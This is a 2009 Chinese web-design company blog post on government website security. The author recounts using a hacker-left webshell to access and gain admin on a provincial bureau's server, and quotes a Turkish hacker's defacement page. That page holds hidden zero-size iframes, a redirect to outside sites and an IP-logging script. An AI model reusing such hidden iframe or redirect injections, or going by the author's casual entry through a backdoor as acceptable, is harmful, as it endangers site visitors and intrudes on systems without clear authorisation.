青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁网站建设、网站制作公司-西宁威势电子信息服务有限公司 首页 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
 
西宁威势最新网站制做案例展示
Lastest Project
 
西宁网站建设  
当前位置为:首页 >> 最新资讯 >> 正文  
[原创]浅谈政府网站的安全性

文章来源: 西宁威势电子信息服务有限公司     发布时间:2009-2-28    浏览次数:6498   

        最近因为发生“躲猫猫”事件使得云南晋宁政府网站被黑客攻击,网页内容换成了:“躲猫猫、打酱油、俯卧撑----武林三大绝学”的内容,就事件本身我们不在这里做任何评论,我们来看看政府网站的安全性问题吧!

       因为我在青海,我就拿我们当地的政府部门一些网站来说事吧。记得那是在08年吧,同事找我改代码,同事告诉我,青海省国土资源厅的网站需要增加一些功能,他没有时间写,让我帮为代写,不好推辞,所以就让同事把代码发给我,代码本身没有什么复杂的地方,没用多长时间就写完了,然后就给同事交工了,等着拿钱 ,事情过去好几天了,差不多都要忘记了,钱也没拿上,突然有天朋友找我说,他把代码交给国土资源厅的客户,但是客户说传不到服务器上去,所以拿不了钱,我听后很郁闷,原来情况是这样的,因为国土资源厅的网站是放在一个独立的服务器上的(政府就是有钱花!)而这个服务器被黑客入侵了,所以管理员登录不了,一登录点确定后又退回到登录界面,如此反复,所以那个技术员(客户)没办法把代码放上去,但是据说领导还要着急看网站,所以那个技术员本人也很着急,唉,遇上这样的事情我还能怎么办呢?代码也写了,钱还拿不到手,干脆好事做到底,送佛送到西吧。我又把国土资源厅的网站解压开来,看了一下里面的代码及文件,不看不知道,一看吓一跳啊,里面惊喜还挺多的!黑客留的后门文件比原文件还要多啊!哈哈,太好办了,直接用黑客留的后门登录到政府部门的服务器上去,用WEBSHELL把我修改好的代码传上去,然后给客户交工,客户很满意,哈哈,美哉,钱可以到手了。但是客户还要求我帮忙看看他的服务器被黑客入侵的事情,这样算下来,也算是授权吧,借助这个WEBSHELL,然后加上服务器上是SQL数据库,不到五分钟,成功拿到管理员权限,登录到服务器上去了,真是想干什么就干什么啊,应客户要求,帮其备份了一些重要文件,然后就删除服务端退出了。

      就此事看看政府网站的安全性,据我同事介绍说,该政府部门为了这个网站,专门有一个13个人的部门来负责,不知是真是假,要是属实的话,真是太浪费老百姓的钱了,政府自己的服务器自己登录不了,而黑客却在上面来去自如,真是让人很难理解!

     再看看最近发生的一件事情吧,是我一个在政府部门工作的同学,说他们网站打开速度很慢,让我帮忙看看,结果抓图如下:

以下是引用片段:
<html>

<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>iskorpitx(TURKISH HACKER)</title>
</head>
<meta http-equiv="refresh"content="5;URL=http://www.mavi1.org">
<embed src="http://www.siyamiozkan.com.tr/labbayk.wma" loop="1" autostart="true" hidden "true" width="128" height="128"></td>
<body bgcolor="#000000" text="#808080">
<p align="center">
<body bgcolor="#000000" text="#808080">
<img src="http://www.mavi1.org/forum/atam.gif"></p>
<p align="center">
&nbsp;</p>
<p align="center"><font size="6">HACKED BY iSKORPiTX</font></p>
<p align="center"><font size="4">(TURKISH HACKER)</font></p>
<p align="center"><b>iskorpitx hacking&amp;security cd si haz齬 mavi1.org ve forumda
gerekli a琮klamalar var acele edin tren kalk齳or</b></p>
<p align="center"><b>D躈YA MARKASI TAKL軹 ED軱EMEZ! HACKERLER VURUR LAMERLER
軳LER!!</b></p>
<p align="center"><b>iskorpitx hacking&amp;security cd sini haz齬lad?/b></p>
<p align="center"><font size="5">iscorpitx</font><font size="5">, marque du
monde, pr閟ente ses salutations ?tout le monde.</font>
<center><script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template=躭ke : <COUNTRY> 辝hir : <CITY> <FLAG> ip Adres : <IP>"></script></center>
<iframe src="http://www.mavi1.org" frameborder="0" width="0" height="0"></iframe>
<iframe src="http://www.mavi1.org/forum" frameborder="0" width="0" height="0"></iframe>
<iframe src="http://rave.au.com/kbd/" frameborder="0" width="0" height="0"></iframe>
<iframe src="http://www.siyamiozkan.com.tr" frameborder="0" width="0" height="0"></iframe>

    网站早就被黑客入侵,百度一下才知道,是土耳其的一个黑客组织干的。


上一篇:男子潜心研究黑客秘籍网上盗走9亿多积分
下一篇:美反恐网络扩招1750名黑客志愿者
评论列表
正在加载评论……
  
评论   
呢  称:
验证码: 若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
与我交谈  与我交谈 与我交谈
乘车路线    汇款方式   加盟合作  人才招聘  
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
业务:青海网站制做青海网站建设青海网页设计西宁网站制做西宁网站建设青海域名注册青海网络推广青海网站推广青海空间租用青海软件开发网站安全网络安全